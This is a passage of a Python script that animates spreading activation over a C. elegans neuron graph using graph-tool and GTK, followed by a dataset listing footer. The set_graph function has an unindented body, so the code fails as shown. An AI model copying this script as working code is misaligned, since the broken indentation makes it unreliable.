    return {"g": g, "gmst": mst_view, "gtc": closure}
def minmax(a):
    """Linearly rescale *a* so its minimum maps to 0 and its maximum to 1."""
    shifted = a - np.min(a)
    return shifted / np.max(shifted)
# %%
"""
def set_graph(type="gtc")
type being either the original graph "g", the MST of it
"gmst" or the transitive closure of the MST "gtc". Defaults
to "gtc".
"""
def set_graph(type="gtc"):
g = init_elegans_net()
graphs = init_graph(g)
g = graphs["g"]
gmst = graphs["gmst"]
gtc = graphs["gtc"]
return g, gmst, gtc
# %%
# %%
####DYNAMICS PARAMETERS
# Activation level above which a vertex is considered spiking.
SPIKE_THRESHOLD = 0.90
# Fraction of potential retained after a spike (currently unused below).
POTENTIAL_LOSS = 0.8
# Number of offscreen frames to render before exiting.
MAX_COUNT = 600
#OFFSCREEN = True
# Render offscreen (to ./frames) when invoked as `script.py offscreen`.
OFFSCREEN = sys.argv[1] == "offscreen" if len(sys.argv) > 1 else False
# %%
g, gmst, gtc = set_graph()
# %%
# Run the dynamics on the MST view of the network.
g = gmst
# %%
# NOTE(review): notebook residue -- this expression's result is discarded.
set(list(map(tuple, gtc.get_all_edges(151))))
# %%
# Frame counter for the offscreen renderer.
count = 0
# %%
def update_state():
    """One step of the spreading-activation dynamics; GTK idle callback.

    The most activated vertex spreads its activation to its out-neighbours,
    weighted by edge weight, then the window is redrawn. Returns True so
    GLib keeps scheduling the callback. In offscreen mode each step is
    saved as a PNG frame and the process exits after MAX_COUNT frames.
    """
    global count, g
    # The "spiker" is the vertex with the highest activation.
    spiker_activation = np.max(g.vp.activation.a)
    spiker = gt.find_vertex(g, g.vp.activation, spiker_activation)[0]
    nbs = g.get_out_neighbors(spiker)
    nbsize = len(nbs)
    if nbsize != 0:
        # Split the spiker's activation evenly across its out-neighbours,
        # scaled by each edge's weight; the spiker loses what it sends.
        spread_val = spiker_activation/nbsize
        for nb in nbs:
            w = g.ep.weight[g.edge(spiker, nb)]
            g.vp.activation[nb] += spread_val*w
            g.vp.activation[spiker] -= spread_val*w
    else:
        # Sink vertex: nothing to spread to (branch intentionally a no-op).
        if g.vp.activation[spiker] >= 1:
            pass
    #if g.vp.activation[nb] >= SPIKE_THRESHOLD:
    win.graph.regenerate_surface()
    win.graph.queue_draw()
    if OFFSCREEN:
        # Save the current frame; stop after MAX_COUNT frames.
        pixbuf = win.get_pixbuf()
        pixbuf.savev(r'./frames/san%06d.png' % count, 'png', [], [])
        count += 1
        if count >= MAX_COUNT:
            sys.exit(0)
    return True
# %%
# Compute a force-directed layout and the shared drawing parameters.
pos = gt.sfdp_layout(g)
PLOT_PARAMS = plot_params(g, None)
if OFFSCREEN and not os.path.exists("./frames"):
    os.mkdir("./frames")
# This creates a GTK+ window with the initial graph layout
if not OFFSCREEN:
    win = gt.GraphWindow(g,
                        pos,
                        geometry=(720, 720),
                        vertex_shape="circle",
                        **PLOT_PARAMS,
                        )
else:
    # Offscreen mode: render into an invisible window whose pixbuf is
    # saved frame-by-frame in update_state().
    win = Gtk.OffscreenWindow()
    win.set_default_size(720, 720)
    win.graph = gt.GraphWidget(g,
                              pos,
                              vertex_shape="circle",
                              **PLOT_PARAMS,
                              )
    win.add(win.graph)
# %%
# Drive the dynamics from the GTK main loop: update_state runs whenever idle.
cid = GLib.idle_add(update_state)
win.connect("delete_event", Gtk.main_quit)
win.show_all()
Gtk.main()
# %%
# %%
| [
"istrozzi@matematica.ufrj.br"
] | istrozzi@matematica.ufrj.br |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.